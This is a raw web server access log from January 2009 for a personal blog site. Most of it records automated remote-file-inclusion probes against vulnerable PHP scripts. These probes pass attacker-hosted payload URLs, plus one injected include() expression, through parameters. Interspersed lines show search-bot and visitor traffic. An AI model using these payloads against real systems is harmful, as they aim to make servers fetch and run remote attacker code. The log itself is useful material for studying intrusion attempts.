207.182.137.218 - - [06/Jan/2009:09:26:56 -0800] "GET /logs//main.php?p=http://www.geocities.com/jakautama30/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:26:56 -0800] "GET /logs/access_080213.log//main.php?p=http://www.geocities.com/jakautama30/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:26:56 -0800] "GET /logs/access_071116.log//main.php?p=http://www.geocities.com/jakautama30/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:26:56 -0800] "GET /main.php?p=http://www.geocities.com/jakautama30/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
204.11.17.16 - - [06/Jan/2009:09:27:01 -0800] "GET /logs/access_081027.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:09:27:01 -0800] "GET /logs/access_081118.log%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:27:01 -0800] "GET /logs/access_080414.log//main.php?p=http://www.geocities.com/anamoza77/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:27:01 -0800] "GET /logs//main.php?p=http://www.geocities.com/anamoza77/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:27:01 -0800] "GET /main.php?p=http://www.geocities.com/anamoza77/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
211.202.2.220 - - [06/Jan/2009:09:27:06 -0800] "GET /logs/?sourcedir=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 200 81172 "-" "Mozilla/5.0" "www.dmulk.com"
211.202.2.220 - - [06/Jan/2009:09:27:06 -0800] "GET /logs/access_080831.log%20%20/?sourcedir=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.202.2.220 - - [06/Jan/2009:09:27:06 -0800] "GET /?sourcedir=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 200 94763 "-" "Mozilla/5.0" "www.dmulk.com"
204.11.17.16 - - [06/Jan/2009:09:27:11 -0800] "GET /logs/access_081027.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:27:13 -0800] "GET /logs/access_080320.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:27:14 -0800] "GET /logs/access_080404.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.220 - - [06/Jan/2009:09:27:15 -0800] "GET /logs/access_080412.log%20%20/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.202.2.220 - - [06/Jan/2009:09:27:15 -0800] "GET /logs/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 200 81172 "-" "Mozilla/5.0" "www.dmulk.com"
211.202.2.220 - - [06/Jan/2009:09:27:16 -0800] "GET /?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 200 94616 "-" "Mozilla/5.0" "www.dmulk.com"
65.55.51.31 - - [06/Jan/2009:09:27:21 -0800] "GET /blog/index.php/feed/ HTTP/1.1" 200 9677 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
211.202.2.220 - - [06/Jan/2009:09:27:48 -0800] "GET /logs/access_080831.log%20%20/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:27:49 -0800] "GET /logs/access_080208.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:09:27:53 -0800] "GET /logs/access_080901.log//includes/settings.inc.php?include_path=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:09:27:53 -0800] "GET /includes/settings.inc.php?include_path=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:09:27:53 -0800] "GET /logs//includes/settings.inc.php?include_path=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:27:54 -0800] "GET /logs/access_080504.log/template.php?goto=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:09:27:56 -0800] "GET /logs/access_080901.log//includes/settings.inc.php?include_path=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:09:27:56 -0800] "GET /includes/settings.inc.php?include_path=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:09:27:56 -0800] "GET /logs//includes/settings.inc.php?include_path=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
200.40.34.42 - - [06/Jan/2009:09:27:57 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.40.34.42 - - [06/Jan/2009:09:27:57 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:28:02 -0800] "GET /logs/access_080225.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.219.29 - - [06/Jan/2009:09:28:02 -0800] "GET /includes/settings.inc.php?include_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.219.29 - - [06/Jan/2009:09:28:03 -0800] "GET /logs/access_080901.log//includes/settings.inc.php?include_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.219.29 - - [06/Jan/2009:09:28:03 -0800] "GET /logs//includes/settings.inc.php?include_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:28:10 -0800] "GET /logs/access_080228.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.232.39 - - [06/Jan/2009:09:28:12 -0800] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/ HTTP/1.0" 200 9435 "http://search.live.com/results.aspx?q=byron" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.232.39 - - [06/Jan/2009:09:28:12 -0800] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.232.39 - - [06/Jan/2009:09:28:12 -0800] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.232.39 - - [06/Jan/2009:09:28:13 -0800] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.232.39 - - [06/Jan/2009:09:28:13 -0800] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.0" 200 29867 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.232.39 - - [06/Jan/2009:09:28:13 -0800] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.0" 200 8888 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.232.39 - - [06/Jan/2009:09:28:14 -0800] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.0" 200 6722 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
204.11.17.16 - - [06/Jan/2009:09:28:16 -0800] "GET /logs/access_080901.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.11.17.16 - - [06/Jan/2009:09:28:18 -0800] "GET /logs/access_080901.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:28:20 -0800] "GET /logs/access_080119.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:28:26 -0800] "GET /logs/access_080414.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:28:31 -0800] "GET /logs/access_080622.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.225.40.194 - - [06/Jan/2009:09:28:31 -0800] "POST /blog/wp-comments-post.php HTTP/1.0" 302 1 "http:/dutchweblog.com/toneykaak/85026/Pub+De+La+Riviere+%28Le%29.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; MyIE2; Maxthon)" "dmulk.com"
220.225.40.194 - - [06/Jan/2009:09:28:34 -0800] "GET /blog/index.php/2008/08/28/occ-american-hondas-part-1/ HTTP/1.0" 200 9825 "http:/dutchweblog.com/toneykaak/85026/Pub+De+La+Riviere+%28Le%29.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; MyIE2; Maxthon)" "dmulk.com"
113.30.66.5 - - [06/Jan/2009:09:28:37 -0800] "GET /logs/access_081027.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.5 - - [06/Jan/2009:09:28:43 -0800] "GET /logs/access_081027.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.202.2.220 - - [06/Jan/2009:09:28:54 -0800] "GET /logs/access_080412.log/?sourcedir=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.40.34.42 - - [06/Jan/2009:09:29:02 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.202.2.220 - - [06/Jan/2009:09:29:03 -0800] "GET /logs/access_080831.log/?sourcedir=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:29:06 -0800] "GET /logs/access_080404.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.40.34.42 - - [06/Jan/2009:09:29:07 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.202.2.220 - - [06/Jan/2009:09:29:08 -0800] "GET /logs/access_080412.log/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:29:10 -0800] "GET /logs/access_080531.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.220 - - [06/Jan/2009:09:29:19 -0800] "GET /logs/access_080831.log/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.129.163.203 - - [06/Jan/2009:09:29:26 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.129.163.203 - - [06/Jan/2009:09:29:26 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:09:29:28 -0800] "GET /logs/access_081207.log/modules/My_eGallery/index.php?basepath=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.129.163.203 - - [06/Jan/2009:09:29:28 -0800] "GET /logs/access_080226.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:09:29:28 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:09:29:28 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.129.163.203 - - [06/Jan/2009:09:29:33 -0800] "GET /logs/access_080724.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:29:36 -0800] "GET /logs/access_081029.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
113.30.66.5 - - [06/Jan/2009:09:29:55 -0800] "GET /logs/access_080901.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.129.163.203 - - [06/Jan/2009:09:29:56 -0800] "GET /logs/access_080226.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.129.163.203 - - [06/Jan/2009:09:29:56 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.129.163.203 - - [06/Jan/2009:09:29:56 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
113.30.66.5 - - [06/Jan/2009:09:29:56 -0800] "GET /logs/access_080901.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.129.163.203 - - [06/Jan/2009:09:29:58 -0800] "GET /logs/access_080724.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:30:03 -0800] "GET /logs/access_080121.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:30:03 -0800] "GET /logs/access_080308.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
94.103.80.70 - - [06/Jan/2009:09:30:18 -0800] "GET /logs/access_080308.log/?REX[INCLUDE_PATH]=http://portal.morpace.com/portal/demo/templates/id5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:09:30:22 -0800] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:09:30:22 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:09:30:23 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:09:30:26 -0800] "GET /logs/access_080906.log%20//components/com_flyspray/startdown.php?file=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:30:58 -0800] "GET /logs/access_081202.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:30:58 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:30:59 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
124.139.67.70 - - [06/Jan/2009:09:31:04 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://oursoultvxq.com/bbs/data/vip/id2.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.139.67.70 - - [06/Jan/2009:09:31:04 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://oursoultvxq.com/bbs/data/vip/id2.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.139.67.70 - - [06/Jan/2009:09:31:04 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://oursoultvxq.com/bbs/data/vip/id2.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:31:06 -0800] "GET /logs/access_081014.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.8 - - [06/Jan/2009:09:31:07 -0800] "GET /logs/access_080530.log%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://business-buket.ru/img/jr/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:31:08 -0800] "GET /logs/access_080414.log//main.php?p=http://h1.ripway.com/budi212/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
77.221.130.8 - - [06/Jan/2009:09:31:18 -0800] "GET /logs/access_080530.log%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://juninhor0x2009.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:31:23 -0800] "GET /logs/access_080414.log//main.php?p=http://www.geocities.com/jakautama30/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:31:31 -0800] "GET /logs/access_081125.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
211.202.2.220 - - [06/Jan/2009:09:31:41 -0800] "GET /logs/access_080714.log/?sourcedir=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.202.2.220 - - [06/Jan/2009:09:31:48 -0800] "GET /logs/access_080714.log/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:31:53 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:31:53 -0800] "GET /logs/access_080320.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:31:53 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
211.202.2.220 - - [06/Jan/2009:09:31:53 -0800] "GET /logs/access_080213.log/?sourcedir=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:31:53 -0800] "GET /logs/access_080530.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:31:53 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:31:53 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
211.202.2.220 - - [06/Jan/2009:09:32:01 -0800] "GET /logs/access_080213.log/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:32:01 -0800] "GET /logs/access_080705.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
124.139.67.70 - - [06/Jan/2009:09:32:03 -0800] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://oursoultvxq.com/bbs/data/vip/id2.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.95.39.220 - - [06/Jan/2009:09:32:08 -0800] "GET /includes/settings.inc.php?include_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:32:08 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:32:08 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:32:08 -0800] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:32:08 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:32:08 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
